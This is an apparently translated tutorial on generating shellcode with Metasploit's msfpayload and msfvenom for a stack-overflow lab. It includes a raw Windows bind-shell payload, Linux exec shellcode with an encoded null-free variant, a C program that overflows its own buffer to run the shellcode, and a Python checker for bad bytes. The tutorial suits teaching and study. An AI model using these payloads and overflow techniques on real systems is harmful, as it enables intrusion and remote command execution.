Overflow attack using Metasploit stacks-2

Source: Internet
Author: User
Tags: windows x64

The basic stack overflow exercise made one thing clear: a very important issue in real-world attacks is shellcode generation.

Using the tools provided by Metasploit you can easily generate shellcode, which can then be validated with the code from the first article.

Let's start with how to generate shellcode (everything below was generated under BT5).

Example reference: http://www.offensive-security.com/metasploit-unleashed/Msfpayload

To list the available payloads:

root@bt:~# msfpayload -l

Framework Payloads (251 total)
==============================

    Name                               Description
    ----                               -----------
    aix/ppc/shell_bind_tcp             Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port            Spawn a shell on an established connection
    aix/ppc/shell_interact             Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp          Connect back to attacker and spawn a command shell
    bsd/sparc/shell_bind_tcp           Listen for a connection and spawn a command shell
    ...snip...
    windows/x64/shell/bind_tcp         Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell/reverse_tcp      Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell_bind_tcp         Listen for a connection and spawn a command shell (Windows x64)
    windows/x64/shell_reverse_tcp      Connect back to attacker and spawn a command shell (Windows x64)
    windows/x64/vncinject/bind_tcp     Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
    windows/x64/vncinject/reverse_tcp  Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)

To view the options of a specific payload:

root@bt:~# msfpayload windows/shell_bind_tcp O

       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 14774
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

Provided by:
  vlad902
  sf

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LPORT     4444             yes       The listen port
RHOST                      no        The target address

Description:
  Listen for a connection and spawn a command shell

Finally, generate the shellcode. Continuing the example above, this produces the shellcode as a C array:

root@bt:~# msfpayload windows/shell_bind_tcp LPORT=7777 C
/*
 * windows/shell_bind_tcp - 341 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=7777, RHOST=, EXITFUNC=process,
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x1e\x61\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

Of course, since we are working in a Linux environment we need Linux shellcode, so we use the exec payload to generate it:

root@bt:~# msfpayload linux/x86/exec CMD=ls C
/*
 * linux/x86/exec - 38 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependChrootBreak=false, AppendExit=false,
 * CMD=ls
 */
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c"
"\x73\x00\x57\x53\x89\xe1\xcd\x80";

OK, now we can verify it with the shell.c from the previous section.

 1 #include <unistd.h>
 2 #include <string.h>                 /* memcpy */
 3 unsigned char large_string[128];    /* size illegible in the source; 128 as in the classic example */
 4 /*
 5  * linux/x86/exec - 38 bytes
 6  * http://www.metasploit.com
 7  * VERBOSE=false, PrependSetresuid=false,
 8  * PrependSetreuid=false, PrependSetuid=false,
 9  * PrependChrootBreak=false, AppendExit=false, CMD=ls
10  */
11 unsigned char shellcode[] =
12 "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
13 "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c"
14 "\x73\x00\x57\x53\x89\xe1\xcd\x80";
15
16 int main(void) {
17     char buffer[96];                /* size illegible in the source; 96 as in the classic example */
18     int i;
19     long *long_ptr = (long *) large_string;
20     for (i = 0; i < sizeof(large_string) / sizeof(long); i++)
21         *(long_ptr + i) = (long) buffer;     /* fill large_string with buffer's address */
22
23     for (i = 0; i < sizeof(shellcode); i++)
24         large_string[i] = shellcode[i];      /* shellcode goes at the front */
25     memcpy(buffer, large_string, sizeof(large_string));   /* overflows buffer, overwriting the return address */
26     return 0;
27 }

Notice that on line 25 I used memcpy instead of strcpy, because the generated shellcode contains a few 0x00 bytes.

Then compile it with the following command and run it to verify:

gcc -fno-stack-protector -z execstack -g -o shell shell.c
/mnt/hgfs/r/stack$ ./shell

To avoid 0x00 bytes in the shellcode you can use msfvenom with an encoder, as in this example:

root@bt:~# msfvenom -p linux/x86/exec CMD=ls -e x86/shikata_ga_nai -b '\x00' -f c
[*] x86/shikata_ga_nai succeeded with size 65 (iteration=1)

unsigned char buf[] =
"\xdb\xd6\xd9\x74\x24\xf4\xbb\xe3\xa4\x6b\x7e\x58\x2b\xc9\xb1"
"\x0a\x83\xc0\x04\x31\x58\x15\x03\x58\x15\x01\x51\x01\x75\x9d"
"\x03\x84\xef\x75\x19\x4a\x79\x62\x09\xa3\x0a\x04\xca\xd3\xc3"
"\xb6\xa3\x4d\x95\xd5\x66\x7a\xa6\x19\x87\x7a\xc5\x6a\x87\x2d"
"\x46\x05\x66\x1c\xe8";

But there is a problem: the generated shellcode cannot be exploited; it raises an illegal instruction and causes a core dump, for an unknown reason.
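As an added example (not code from the original article), here is a small Python checker for the two things the text above does by eye: it parses the C-format array that msfpayload/msfvenom print, cross-checks the parsed byte count against the size stated in the tool's header, and lists every offset holding a byte the delivery path cannot carry (here 0x00, the reason line 25 of shell.c uses memcpy rather than strcpy). The embedded inputs are the exec and shikata_ga_nai outputs shown above; the function names are my own.

```python
import re

# Constructed inputs: the two C-format outputs shown in the article, verbatim.
EXEC_LS_C = r'''
/*
 * linux/x86/exec - 38 bytes
 * http://www.metasploit.com
 */
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c"
"\x73\x00\x57\x53\x89\xe1\xcd\x80";
'''
ENCODED_LS_C = r'''
[*] x86/shikata_ga_nai succeeded with size 65 (iteration=1)
unsigned char buf[] =
"\xdb\xd6\xd9\x74\x24\xf4\xbb\xe3\xa4\x6b\x7e\x58\x2b\xc9\xb1"
"\x0a\x83\xc0\x04\x31\x58\x15\x03\x58\x15\x01\x51\x01\x75\x9d"
"\x03\x84\xef\x75\x19\x4a\x79\x62\x09\xa3\x0a\x04\xca\xd3\xc3"
"\xb6\xa3\x4d\x95\xd5\x66\x7a\xa6\x19\x87\x7a\xc5\x6a\x87\x2d"
"\x46\x05\x66\x1c\xe8";
'''

HEX_ESCAPE = re.compile(r"\\[xX]([0-9a-fA-F]{2})")            # one \xNN escape
DECLARED_SIZE = re.compile(r"(?:-|with size)\s*(\d+)\s*(?:bytes|\()")

def parse_c_shellcode(text: str) -> bytes:
    """Turn every \\xNN escape of the C array into the raw byte it encodes."""
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(text))

def declared_size(text: str):
    """Byte count the tool itself printed ('- 38 bytes' or 'with size 65 ('), else None."""
    m = DECLARED_SIZE.search(text)
    return int(m.group(1)) if m else None

def find_bad_chars(buf: bytes, bad: bytes = b"\x00") -> list:
    """(offset, value) of every byte the delivery path cannot carry."""
    return [(i, b) for i, b in enumerate(buf) if b in bad]

def strcpy_copies(buf: bytes) -> int:
    """How many bytes strcpy() would copy before stopping at the first NUL."""
    return buf.index(0) if 0 in buf else len(buf)

def audit(text: str, bad: bytes = b"\x00") -> dict:
    """Parse one C-format dump and report length, header consistency and bad bytes."""
    buf = parse_c_shellcode(text)
    size = declared_size(text)
    return {"length": len(buf),
            "size_matches_header": size is None or size == len(buf),
            "bad_chars": find_bad_chars(buf, bad),
            "strcpy_copies": strcpy_copies(buf)}
```

For the exec payload the report shows five 0x00 bytes, the first at offset 15, so strcpy would have delivered only 15 of the 38 bytes; the encoded payload parses to 65 bytes with no bad characters, matching its header.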
